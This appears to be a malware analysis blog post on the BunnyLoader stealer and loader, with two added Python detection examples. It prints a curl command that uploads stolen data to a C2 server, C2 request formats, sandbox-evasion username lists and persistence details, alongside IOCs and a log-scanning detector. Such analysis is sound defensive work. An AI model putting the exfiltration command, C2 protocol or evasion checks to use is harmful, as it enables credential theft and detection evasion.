Category: Threat Research
Introduction
In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service (MaaS) threat called "BunnyLoader" being sold on various forums. BunnyLoader provides functionality such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more. BunnyLoader employs a keylogger to log keystrokes and a clipper to monitor the victim's clipboard and replace cryptocurrency wallet addresses with actor-controlled ones. Once the information is obtained, BunnyLoader packs the data into a ZIP archive and transmits it to a command-and-control (C2) server. In this blog, we'll describe how BunnyLoader works and its technical components.
Key Takeaways
ThreatLabz identified a new malware loader written in C/C++ named "BunnyLoader" sold on various forums for $250.
BunnyLoader is under rapid development with multiple feature updates and bug fixes.
BunnyLoader employs various anti-sandbox techniques during its attack sequence.
BunnyLoader downloads and executes a second-stage payload, logs keys, steals sensitive information and cryptocurrency, and executes remote commands.
Basics
In early September, ThreatLabz came across a new malware loader named BunnyLoader. The malware was being sold on various forums by a user named "PLAYER_BUNNY"/"PLAYER_BL", who seems to be one of the developers of the loader, as shown in the figure below.
Figure 1: BunnyLoader advertisement from criminal forums.
Based on the advertisement, BunnyLoader has the following features:
Written in C/C++
Fileless loader – download & execute further malware stages in memory
Consists of stealer and clipper capabilities
Remote command execution
Incorporates anti-analysis techniques
Provides a web panel showcasing stealer logs, total clients, active tasks and much more
Price – $250 (Lifetime)
Since BunnyLoader's v1.0 initial release on September 4, 2023, the malware has been under rapid development, with many feature updates and bug fixes released between the 4th of September and the time this blog was written (September 29, 2023). In the table below, you can see that BunnyLoader's updates address bugs, changes to the C2 panel, and even new pricing tiers.
BunnyLoader release history (version, release date, updates):
BunnyLoader v1.0 (Sept 4, 2023): initial release
BunnyLoader v1.1 (Sept 5, 2023): client bug fix; compress stealer logs before uploading; command added for reverse shell: pwd
BunnyLoader v1.2 (Sept 6, 2023): added browser history recovery to stealer; added NGRok auth-token recovery to stealer; added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio, Iridium, Maxthon3)
BunnyLoader v1.3 (Sept 9, 2023): added credit card recovery to stealer; added support for 16 different credit card types; C2 bug fixes
BunnyLoader v1.4 (Sept 10, 2023): implemented AV evasion
BunnyLoader v1.5 (Sept 11, 2023): added VPN recovery to stealer (ProtonVPN & OpenVPN); fileless loader bug fixes; optimization in loading logs
BunnyLoader v1.6 (Sept 12, 2023): added downloads history viewer to stealer; added anti-sandbox techniques
BunnyLoader v1.7 (Sept 15, 2023): implemented additional AV evasion
BunnyLoader v1.8 (Sept 15, 2023): implemented keylogger functionality; bug fixes in execution of tasks; C2 bug fixes
BunnyLoader v1.9 (Sept 17, 2023): added game recovery to stealer (Uplay & Minecraft); added 5 Chromium browser paths; added 1 desktop wallet recovery to stealer
BunnyLoader v2.0 (Sept 27, 2023): C2 GUI changes; fixed critical vulnerabilities in the C2 panel (a SQL injection that would give access to the database, and XSS); major bugs fixed; C2 now detects and blocks exploit attempts; optimization in stealer; optimization in fileless loader; a private stub is now sold separately (advanced and proactive anti-analysis, in-memory payload injection with x86/x64 support, AV evasion, persistence); new prices: payload $250, payload + stub $350
C2 Panel
The BunnyLoader C2 panel showcases a list of various tasks including:
downloading and executing additional malware
keylogging
stealing credentials
manipulating a victim's clipboard to steal cryptocurrency
running remote commands on the infected machine
The parameters consisting of the download URL and the cryptocurrency wallet addresses are added in the panel as shown below.
Figure 2: A screenshot of the BunnyLoader C2 panel configuration.
The BunnyLoader panel also provides infection statistics, the total number of connected/disconnected clients, active tasks and stealer logs; each of these can be cleared from the panel.
Figure 3: A screenshot of the statistics and options to clear data in the BunnyLoader C2 panel.
In addition, the infected machines can be controlled remotely through the C2 panel, as shown in the screenshot below.
Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems.
Technical Analysis
In the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions:
Creates a new registry value named "Spyware_Blocker" in the Run key (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) whose data is the path to the BunnyLoader binary. This value gives BunnyLoader persistence on the machine.
Hides its window using ShowWindow() with nCmdShow set to SW_HIDE
Creates a mutex named "BunnyLoader_MUTEXCONTROL" via CreateMutexW()
Performs the following anti-VM and anti-sandbox checks:
Checks for the following modules and exports:
SxIn.dll – 360 Total Security
cmdvrt32.dll / cmdvrt64.dll – Comodo Antivirus
wine_get_unix_file_name – detects Wine
SbieDll.dll – Sandboxie
Checks for a VM by querying the following WMI classes in the ROOT\CIMV2 namespace (SELECT * FROM <class>):
Win32_VideoController
Win32_Processor
Win32_NetworkAdapter
Win32_BIOS
Win32_ComputerSystem
Checks for a Docker container by reading "/proc/1/cgroup" (a Linux path that will not normally exist on a Windows host); if a container is detected, BunnyLoader performs no further malicious actions.
Checks for the following blacklisted sandbox usernames:
ANYRUN
Sandbox
Test
John Doe
Abby
Timmy
Maltest
malware
Emily
Timmy
Paul Jones
CurrentUser
IT-ADMIN
Walker
Lisa
WDAGUtilityAccount
Virus
fred
If a sandbox is identified, BunnyLoader shows the following error message instead of continuing:
"The version of this file is not compatible with the current version of Windows you are running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher."
Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:
GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; charset=UTF-8
Connected
The registration request sent to the C2 server (shown above) contains the following parameters:
country: the country the infected system connects from, obtained from http[:]//ip-api.com/csv with the user agent "BunnyRequester"
ip: the victim's public IP, obtained from http[:]//api.ipify.org with the user agent "BunnyRequester"
host: the hostname, obtained via GetComputerNameA
ver: the BunnyLoader version (e.g., 2.0)
system: the operating system, obtained by running systeminfo | findstr /B /C:"OS Name" (the trailing %0A in the request is the newline from that command's output, which the loader does not strip)
privs: the privileges of the current user, determined via OpenProcessToken; "Admin" if the user is an administrator, otherwise "user"
av: the installed anti-virus product, obtained via wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
The user agent for the registration request itself is "BunnyLoader". If the response from the C2 is "Connected", BunnyLoader proceeds to its core malicious actions.
Task Execution
After registration, BunnyLoader sends a task request to the C2 server, "http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>", with the user agent "BunnyTasks". As shown below, the response to the task request consists of "ID", "Name" and "Params" fields.
GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8
ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k
Here "Name" is the module (functionality) to be executed and "Params" is the parameter passed to the module. A single response can carry several tasks back to back, as in the example above, which queues a stealer run and sets the clipper's Bitcoin address. Based on the module name received, BunnyLoader performs the corresponding action.
BunnyLoader consists of the following tasks:
Trojan Downloader
Download and Execute (Fileless Execution)
Download and Execute (Disk Execution)
Intruder
Run Keylogger
Run Stealer
Clipper
Bitcoin
Monero
Ethereum
Litecoin
Dogecoin
ZCash
Tether
Remote Command Execution
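To make the record format concrete, here is an added example (not code from the original post or from BunnyLoader itself) that splits a task response like the one above into its individual tasks and pulls out the clipper wallet configuration. The module set is taken from the task list above; the sample body is the response shown on this page, with its <bitcoin_address> redaction left in place.

```python
import re
from typing import Dict, List

# Module names from the task list above; a name outside this set is reported as unknown.
KNOWN_TASKS = {
    "Download and Execute (Fileless Execution)", "Download and Execute (Disk Execution)",
    "Run Keylogger", "Run Stealer", "Remote Command Execution",
    "Bitcoin", "Monero", "Ethereum", "Litecoin", "Dogecoin", "ZCash", "Tether",
}
CLIPPER_COINS = {"Bitcoin", "Monero", "Ethereum", "Litecoin", "Dogecoin", "ZCash", "Tether"}

# Each task is "ID: <n> Name: <module> Params: <value>"; records are concatenated with no
# delimiter, so a record ends where the next "ID: <n> Name:" begins (or at end of body).
_TASK_RE = re.compile(
    r"ID:\s*(\d+)\s+Name:\s*(.*?)\s+Params:\s*(.*?)(?=\s*ID:\s*\d+\s+Name:|\Z)", re.S
)

# The response body from the page; <bitcoin_address> is the page's own redaction, kept as-is.
SAMPLE_RESPONSE = "ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k"


def parse_tasks(body: str) -> List[Dict[str, object]]:
    """Split a TaskHandler.php response into one dict per task."""
    tasks = []
    for m in _TASK_RE.finditer(body):
        name = m.group(2).strip()
        tasks.append({
            "id": int(m.group(1)),
            "name": name,
            "params": m.group(3).strip(),
            "known": name in KNOWN_TASKS,
        })
    return tasks


def clipper_targets(tasks: List[Dict[str, object]]) -> Dict[str, str]:
    """Coin -> attacker wallet address for the clipper configuration tasks in a response."""
    return {t["name"]: t["params"] for t in tasks if t["name"] in CLIPPER_COINS and t["params"]}


if __name__ == "__main__":
    parsed = parse_tasks(SAMPLE_RESPONSE)
    for t in parsed:
        print(t)
    print("clipper config:", clipper_targets(parsed))
```

The lookahead is what makes the split work: the "Run Stealer" record has an empty Params field, so the only signal that it has ended is the next "ID:" marker.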
Run Keylogger Task
BunnyLoader implements a basic keylogger that polls GetAsyncKeyState() to record keystrokes. The output of the keylogger is stored in the file "C:\Users\<username>\AppData\Local\Keystrokes.txt".
Run Stealer Task
BunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. The stolen information is stored in a folder named "BunnyLogs" in the AppData\Local directory, which is compressed as a ZIP archive and exfiltrated to the C2 server. The following are the web browser profile paths targeted by BunnyLoader:
7Star\7Star\User Data
Yandex\YandexBrowser\User Data
CentBrowser\User Data
Comodo\User Data
Chedot\User Data
360Browser\Browser\User Data
Vivaldi\User Data
Maxthon3\User Data
Kometa\User Data
K-Melon\User Data
Elements Browser\User Data
Google\Chrome\User Data
Sputnik\Sputnik\User Data
Epic Privacy Browser\User Data
Nichrome\User Data
uCozMedia\Uran\User Data
CocCoc\Browser\User Data
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Uran\User Data
CatalinaGroup\Citrio\User Data
Chromodo\User Data
Coowon\Coowon\User Data
Mail.Ru\Atom\User Data
liebao\User Data
Microsoft\Edge\User Data
QIP Surf\User Data
BraveSoftware\Brave-Browser\User Data
Orbitum\User Data
Chromium\User Data
Comodo\Dragon\User Data
Google(x86)\Chrome\User Data
Amigo\User\User Data
MapleStudio\ChromePlus\User Data
Torch\User Data
Iridium\User Data
BunnyLoader steals the following information from these web browsers:
AutoFill data
Credit cards
Downloads
History
Passwords
The malware targets the following cryptocurrency wallets:
Armory
Exodus
AutomaticWallet
Bytecoin
Ethereum
Coinomi
Jaxx
Electrum
Guarda
BunnyLoader steals credentials from the following VPN clients:
ProtonVPN
OpenVPN
Credentials are also stolen from following messaging applications:
Skype
Tox
Signal
Element
ICQ
Examples of the stolen information are shown in the figure below. The logs consist of an information.txt file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information.
Figure 5: A screenshot of the information exfiltrated by BunnyLoader.
The stolen data is archived from PowerShell using the .NET System.IO.Compression.ZipFile class (a .NET type, not a cmdlet) with the filename "BunnyLogs_<hostname>.zip". The ZIP archive is exfiltrated to the C2 server via the following curl command:
cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip" http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php
BunnyLoader also performs a stealer registration request containing statistics about the stolen information and a link to the exfiltrated logs, with the user agent "BunnyStealer", as shown below:
GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Microsoft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&link=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
Clipper Task
The BunnyLoader clipper module checks a victim's clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.
In this case, the targeted cryptocurrencies are:
Bitcoin
Monero
Ethereum
Litecoin
Dogecoin
ZCash
Tether
The clipper receives the cryptocurrency wallet addresses to replace from the C2 server.
Download and Execute Task
BunnyLoader performs two types of download and execute functions.
The first type downloads a file from a URL provided by the C2, writes it to disk in the AppData\Local directory and executes it.
The second type is fileless: BunnyLoader creates a "notepad.exe" process in a suspended state, downloads the payload from the received URL with the user agent "BunnyLoader_Dropper" into a memory buffer, and then performs process hollowing to inject the downloaded payload into the suspended "notepad.exe" process, as shown in the figure below.
Figure 6: A screenshot of BunnyLoader fileless download and executing code.
After a task completes, BunnyLoader sends a task completion request with the user agent "TaskCompleted", where CommandID is the task ID. An example task completion request is shown below:
http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461
Remote Command Execution Task
BunnyLoader performs remote command execution from the C2 panel. It fetches the commands to execute on the infected machine via an "echoer" request to the C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent "BunnyTasks", as shown in the figure below. BunnyLoader parses the response, checks for the commands "help", "cd" and "pwd", and executes the received command using _popen; the command output is sent to the C2 server in the "&value=" parameter of a result request (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent "BunnyShell".
Figure 7: A screenshot of BunnyLoader remote command execution.
BunnyLoader also sends a heartbeat request to inform the C2 that the infected system is online, as shown below. The user agent for the heartbeat is "HeartBeat_Sender".
GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8
Client online
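The user agents and /Bunny/ endpoints above are distinctive enough to hunt for in web proxy logs. The following is an added example (not from the original post) that does this over a few constructed log lines in a hypothetical "<timestamp> <source> <method> <url> "<user-agent>"" layout. The ip-api.com line shows a hit on user agent alone, since the lookup service itself is legitimate, and decoding the registration query string exposes the trailing newline that the loader leaves in the system value.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# User agents observed in the BunnyLoader traffic above; the loader sets a distinct one per routine.
BUNNY_USER_AGENTS = {
    "BunnyLoader", "BunnyRequester", "BunnyTasks", "BunnyStealer",
    "BunnyShell", "BunnyLoader_Dropper", "TaskCompleted", "HeartBeat_Sender",
}

# Panel endpoints under /Bunny/ seen in the requests above.
_ENDPOINT_RE = re.compile(
    r"/Bunny/(Add|TaskHandler|Uploader|StealerRegistration|Echoer|ResultCMD|Heartbeat)\.php$"
)

# Hypothetical proxy log layout used for the constructed sample: <ts> <src> <method> <url> "<ua>"
_LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample lines (not real captures): one IP lookup with the loader's user agent,
# the registration request, one line of ordinary browsing, and the stealer statistics request.
SAMPLE_LOG = [
    '2023-09-25T21:11:40Z 10.0.0.5 GET http://ip-api.com/csv "BunnyRequester"',
    '2023-09-25T21:11:41Z 10.0.0.5 GET http://37.139.129.145/Bunny/Add.php?country=US&ip=203.0.113.7'
    '&host=DESKTOP-1&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender "BunnyLoader"',
    '2023-09-25T21:11:43Z 10.0.0.6 GET https://www.example.com/index.html "Mozilla/5.0"',
    '2023-09-25T21:47:41Z 10.0.0.5 GET http://37.139.129.145/Bunny/StealerRegistration.php?country=US'
    '&ip=203.0.113.7&system=Microsoft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0'
    '&link=http%3A%2F%2F37.139.129.145%2FBunny%2FStealerLogs%2FBunnyLogs_468325.zip'
    '&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 "BunnyStealer"',
]


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a line matching BunnyLoader's user agents or endpoints, else None."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    ts, src, _method, url, ua = m.groups()
    parts = urlsplit(url)
    ep = _ENDPOINT_RE.search(parts.path)
    ua_hit = ua in BUNNY_USER_AGENTS
    if not ep and not ua_hit:
        return None
    # parse_qs decodes '+' and %XX, so the %0A that systeminfo leaves in 'system'
    # surfaces here as a literal trailing newline.
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    finding: Dict[str, object] = {
        "ts": ts, "src": src, "c2": parts.hostname,
        "endpoint": ep.group(1) + ".php" if ep else None,
        "user_agent": ua, "ua_match": ua_hit,
        "bot": {k: query[k] for k in ("host", "ver", "system", "privs", "av") if k in query},
    }
    if finding["endpoint"] == "StealerRegistration.php":
        finding["stolen"] = {k: int(query[k]) for k in
                             ("chromium", "crypto", "messages", "vpn", "keys", "games") if k in query}
        finding["log_url"] = query.get("link")  # where the ZIP of stolen data was uploaded
    return finding


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over a log and keep only the hits."""
    return [f for f in (classify(line) for line in lines) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the exact user-agent strings is cheap and high-signal, but a stub rebuild could change them; the /Bunny/*.php path set and the BotID/CommandID query parameters are the second, independent indicator worth keeping in the rule.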
Conclusion
BunnyLoader is a new MaaS threat that is continuously evolving its tactics and adding new features to carry out successful campaigns against its targets. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe.
Detection name: Win32.Downloader.BunnyLoader
Indicators of Compromise (IOCs)
C2 Server – 37[.]139[.]129[.]145/Bunny/
BunnyLoader samples:
dbf727e1effc3631ae634d95a0d88bf3
bbf53c2f20ac95a3bc18ea7575f2344b
59ac3eacd67228850d5478fd3f18df78